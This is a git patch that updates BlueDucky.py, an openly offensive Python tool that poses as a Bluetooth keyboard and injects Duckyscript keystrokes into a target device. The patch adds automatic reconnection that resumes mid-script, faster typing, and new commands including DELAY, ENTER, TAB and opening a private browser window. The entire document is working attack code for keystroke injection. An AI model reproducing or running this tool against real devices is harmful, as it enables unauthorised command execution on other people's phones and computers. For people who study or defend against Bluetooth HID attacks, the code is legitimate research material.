From 495442ed7ee697467a953ff8d16d61118c871aee Mon Sep 17 00:00:00 2001 From: Opabinia <144001335+pentestfunctions@users.noreply.github.com> Date: Fri, 19 Jan 2024 20:39:59 +1300 Subject: [PATCH] Update BlueDucky.py --- BlueDucky.py | 300 +++++++++++++++++++++++++++++++++------------------ 1 file changed, 198 insertions(+), 102 deletions(-) diff --git a/BlueDucky.py b/BlueDucky.py index 2da7c0d..c386289 100644 --- a/BlueDucky.py +++ b/BlueDucky.py @@ -6,6 +6,7 @@ import time from multiprocessing import Process from pydbus import SystemBus from enum import Enum +import datetime from utils.menu_functions import (main_menu, read_duckyscript, run, restart_bluetooth_daemon, get_target_address) @@ -117,6 +118,14 @@ class L2CAPConnectionManager: for client in self.clients.values(): client.close() +# Custom exception to handle reconnection +class ReconnectionRequiredException(Exception): + def __init__(self, message, current_line=0, current_position=0): + super().__init__(message) + time.sleep(2) + self.current_line = current_line + self.current_position = current_position + class L2CAPClient: def __init__(self, addr, port): self.addr = addr @@ -143,31 +152,41 @@ class L2CAPClient: self.connected = False self.sock = None + def reconnect(self): + # Notify the main script or trigger a reconnection process + raise ReconnectionRequiredException("Reconnection required") + def send(self, data): if not self.connected: log.error("[TX] Not connected") - return + self.reconnect() - log.debug(f"[TX-{self.port}] Attempting to send data: {binascii.hexlify(data).decode()}") - if self.attempt_send(data, 0.001): + # Get the current timestamp + timestamp = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S.%f")[:-3] + + # Add the timestamp to your log message + log.debug(f"[{timestamp}][TX-{self.port}] Attempting to send data: {binascii.hexlify(data).decode()}") + try: + self.attempt_send(data) log.debug(f"[TX-{self.port}] Data sent successfully") - else: - log.error(f"[TX-{self.port}] ERROR! Timed out sending data") + except bluetooth.btcommon.BluetoothError as ex: + log.error(f"[TX-{self.port}] Bluetooth error: {ex}") + self.reconnect() + self.send(data) # Retry sending after reconnection + except Exception as ex: + log.error(f"[TX-{self.port}] Exception: {ex}") + raise - def attempt_send(self, data, timeout): + def attempt_send(self, data, timeout=0.5): start = time.time() while time.time() - start < timeout: try: self.sock.send(data) - return True + return except bluetooth.btcommon.BluetoothError as ex: if ex.errno != 11: # no data available - raise ex + raise time.sleep(0.001) - except Exception as ex: - log.error(f"[TX-{self.port}] Exception: {ex}") - self.connected = False - return False def recv(self, timeout=0): start = time.time() @@ -212,7 +231,7 @@ class L2CAPClient: def send_keyboard_report(self, *args): self.send(self.encode_keyboard_input(*args)) - def send_keypress(self, *args, delay=0.01): + def send_keypress(self, *args, delay=0.004): if args: log.debug(f"Attempting to send... {args}") self.send(self.encode_keyboard_input(*args)) @@ -220,8 +239,10 @@ class L2CAPClient: # If no arguments, send an empty report to release keys self.send(self.encode_keyboard_input()) time.sleep(delay) + # Update current_position here after successful send + return True # Indicate successful send - def send_keyboard_combination(self, modifier, key, delay=0.01): + def send_keyboard_combination(self, modifier, key, delay=0.004): # Press the combination press_report = self.encode_keyboard_input(modifier, key) self.send(press_report) @@ -232,85 +253,144 @@ class L2CAPClient: self.send(release_report) time.sleep(delay) -def process_duckyscript(client, duckyscript): - client.send_keypress('') # Send empty report +def process_duckyscript(client, duckyscript, current_line=0, current_position=0): + client.send_keypress('') # Send empty report to ensure a clean start time.sleep(0.5) shift_required_characters = "!@#$%^&*()_+{}|:\"<>?ABCDEFGHIJKLMNOPQRSTUVWXYZ" - for line in duckyscript: - line = line.strip() - if not line or line.startswith("REM"): - continue + try: + for line_number, line in enumerate(duckyscript): + if line_number < current_line: + continue # Skip already processed lines - if line.startswith("STRING"): - text = line[7:] - for char in text: - try: - if char.isdigit(): - key_code = getattr(Key_Codes, f"_{char}") - client.send_keypress(key_code) - elif char == " ": - client.send_keypress(Key_Codes.SPACE) - elif char == "[": - client.send_keypress(Key_Codes.LEFTBRACE) - elif char == "]": - client.send_keypress(Key_Codes.RIGHTBRACE) - elif char == ";": - client.send_keypress(Key_Codes.SEMICOLON) - elif char == "'": - client.send_keypress(Key_Codes.QUOTE) - elif char == "/": - client.send_keypress(Key_Codes.SLASH) - elif char == ".": - client.send_keypress(Key_Codes.DOT) - elif char == ",": - client.send_keypress(Key_Codes.COMMA) - elif char == "|": - client.send_keypress(Key_Codes.PIPE) - elif char == "-": - client.send_keypress(Key_Codes.MINUS) - elif char == "=": - client.send_keypress(Key_Codes.EQUAL) - elif char in shift_required_characters: - key_code_str = char_to_key_code(char) - if key_code_str: - key_code = getattr(Key_Codes, key_code_str) - client.send_keyboard_combination(Modifier_Codes.SHIFT, key_code) - else: - log.warning(f"Unsupported character '{char}' in Duckyscript") - elif char.isalpha(): - key_code = getattr(Key_Codes, char.lower()) - if char.isupper(): - client.send_keyboard_combination(Modifier_Codes.SHIFT, key_code) - else: - client.send_keypress(key_code) - else: - key_code = char_to_key_code(char) - if key_code: - client.send_keypress(key_code) - else: - log.warning(f"Unsupported character '{char}' in Duckyscript") - - client.send_keypress() # Release after each key press - except AttributeError as e: - log.warning(f"Attribute error: {e} - Unsupported character '{char}' in Duckyscript") - - elif any(mod in line for mod in ["SHIFT", "ALT", "CTRL", "GUI", "COMMAND", "WINDOWS"]): - # Process modifier key combinations - components = line.split() - if len(components) == 2: - modifier, key = components - try: - # Convert to appropriate enums - modifier_enum = getattr(Modifier_Codes, modifier.upper()) - key_enum = getattr(Key_Codes, key.lower()) - client.send_keyboard_combination(modifier_enum, key_enum) - log.debug(f"Sent combination: {line}") - except AttributeError: - log.warning(f"Unsupported combination: {line}") + if line_number == current_line and current_position > 0: + line = line[current_position:] # Resume from the last position within the current line else: - log.warning(f"Invalid combination format: {line}") + current_position = 0 # Reset position for new line + + line = line.strip() + if not line or line.startswith("REM"): + continue + if line.startswith("TAB"): + client.send_keypress(Key_Codes.TAB) + if line.startswith("PRIVATE_BROWSER"): + report = bytes([0xa1, 0x01, Modifier_Codes.CTRL.value | Modifier_Codes.SHIFT.value, 0x00, Key_Codes.n.value, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00]) + client.send(report) + # Don't forget to send a release report afterwards + release_report = bytes([0xa1, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00]) + client.send(release_report) + if line.startswith("VOLUME_UP"): + # Send GUI + V + hid_report_gui_v = bytes.fromhex("a1010800190000000000") + client.send(hid_report_gui_v) + time.sleep(0.1) # Short delay + + client.send_keypress(Key_Codes.TAB) + + # Press UP while holding GUI + V + hid_report_up = bytes.fromhex("a1010800195700000000") + client.send(hid_report_up) + time.sleep(0.1) # Short delayF + + # Release all keys + hid_report_release = bytes.fromhex("a1010000000000000000") + client.send(hid_report_release) + if line.startswith("DELAY"): + try: + # Extract delay time from the line + delay_time = int(line.split()[1]) # Assumes delay time is in milliseconds + time.sleep(delay_time / 1000) # Convert milliseconds to seconds for sleep + except ValueError: + log.error(f"Invalid DELAY format in line: {line}") + except IndexError: + log.error(f"DELAY command requires a time parameter in line: {line}") + continue # Move to the next line after the delay + if line.startswith("STRING"): + text = line[7:] + for char_position, char in enumerate(text, start=1): + # Process each character + try: + if char.isdigit(): + key_code = getattr(Key_Codes, f"_{char}") + client.send_keypress(key_code) + elif char == " ": + client.send_keypress(Key_Codes.SPACE) + elif char == "[": + client.send_keypress(Key_Codes.LEFTBRACE) + elif char == "]": + client.send_keypress(Key_Codes.RIGHTBRACE) + elif char == ";": + client.send_keypress(Key_Codes.SEMICOLON) + elif char == "'": + client.send_keypress(Key_Codes.QUOTE) + elif char == "/": + client.send_keypress(Key_Codes.SLASH) + elif char == ".": + client.send_keypress(Key_Codes.DOT) + elif char == ",": + client.send_keypress(Key_Codes.COMMA) + elif char == "|": + client.send_keypress(Key_Codes.PIPE) + elif char == "-": + client.send_keypress(Key_Codes.MINUS) + elif char == "=": + client.send_keypress(Key_Codes.EQUAL) + elif char in shift_required_characters: + key_code_str = char_to_key_code(char) + if key_code_str: + key_code = getattr(Key_Codes, key_code_str) + client.send_keyboard_combination(Modifier_Codes.SHIFT, key_code) + else: + log.warning(f"Unsupported character '{char}' in Duckyscript") + elif char.isalpha(): + key_code = getattr(Key_Codes, char.lower()) + if char.isupper(): + client.send_keyboard_combination(Modifier_Codes.SHIFT, key_code) + else: + client.send_keypress(key_code) + else: + key_code = char_to_key_code(char) + if key_code: + client.send_keypress(key_code) + else: + log.warning(f"Unsupported character '{char}' in Duckyscript") + + current_position = char_position + + except AttributeError as e: + log.warning(f"Attribute error: {e} - Unsupported character '{char}' in Duckyscript") + + client.send_keypress() # Release after each key press + client.send_keypress() + + elif any(mod in line for mod in ["SHIFT", "ALT", "CTRL", "GUI", "COMMAND", "WINDOWS"]): + # Process modifier key combinations + components = line.split() + if len(components) == 2: + modifier, key = components + try: + # Convert to appropriate enums + modifier_enum = getattr(Modifier_Codes, modifier.upper()) + key_enum = getattr(Key_Codes, key.lower()) + client.send_keyboard_combination(modifier_enum, key_enum) + log.debug(f"Sent combination: {line}") + except AttributeError: + log.warning(f"Unsupported combination: {line}") + else: + log.warning(f"Invalid combination format: {line}") + elif line.startswith("ENTER"): + client.send_keypress(Key_Codes.ENTER) + client.send_keypress() # Release after each key press + client.send_keypress() + # After processing each line, reset current_position to 0 and increment current_line + current_position = 0 + current_line += 1 + + except ReconnectionRequiredException: + raise ReconnectionRequiredException("Reconnection required", current_line, current_position) + except Exception as e: + log.error(f"Error during script execution: {e}") def char_to_key_code(char): # Mapping for special characters that always require SHIFT @@ -429,7 +509,7 @@ class Key_Codes(Enum): LEFTBRACE = 0x2f RIGHTBRACE = 0x30 CAPSLOCK = 0x39 - VOLUME_UP = 0xed + VOLUME_UP = 0x3b VOLUME_DOWN = 0xee SEMICOLON = 0x33 COMMA = 0x36 @@ -442,6 +522,10 @@ class Key_Codes(Enum): LEFT_BRACKET = 0x2f RIGHT_BRACKET = 0x30 DOT = 0x37 + RIGHT = 0x4f + LEFT = 0x50 + DOWN = 0x51 + UP = 0x52 # SHIFT KEY MAPPING EXCLAMATION_MARK = 0x1e @@ -488,6 +572,14 @@ def establish_connections(connection_manager): if not connection_manager.connect_all(): raise ConnectionFailureException("Failed to connect to all required ports") +def setup_and_connect(connection_manager, target_address): + connection_manager.create_connection(1) # SDP + connection_manager.create_connection(17) # HID Control + connection_manager.create_connection(19) # HID Interrupt + initialize_pairing('hci0', target_address) + establish_connections(connection_manager) + return connection_manager.clients[19] + # Main function def main(): log.basicConfig(level=log.DEBUG) @@ -504,21 +596,25 @@ def main(): adapter = setup_bluetooth(target_address) adapter.enable_ssp() + + current_line = 0 + current_position = 0 + connection_manager = L2CAPConnectionManager(target_address) - try: - connection_manager = L2CAPConnectionManager(target_address) - connection_manager.create_connection(1) # SDP - connection_manager.create_connection(17) # HID Control - connection_manager.create_connection(19) # HID Interrupt - - initialize_pairing('hci0', target_address) - establish_connections(connection_manager) - hid_interrupt_client = connection_manager.clients[19] - process_duckyscript(hid_interrupt_client, duckyscript) - except ConnectionFailureException as e: - log.error(f"Connection failure: {e}") - terminate_child_processes() - sys.exit("Exiting script due to connection failure") + while True: + try: + hid_interrupt_client = setup_and_connect(connection_manager, target_address) + process_duckyscript(hid_interrupt_client, duckyscript, current_line, current_position) + break # Exit loop if successful + except ReconnectionRequiredException as e: + log.info("Reconnection required. Attempting to reconnect...") + current_line = e.current_line + current_position = e.current_position + connection_manager.close_all() + # Sleep before retrying to avoid rapid reconnection attempts + time.sleep(2) + + #process_duckyscript(hid_interrupt_client, duckyscript) if __name__ == "__main__": try: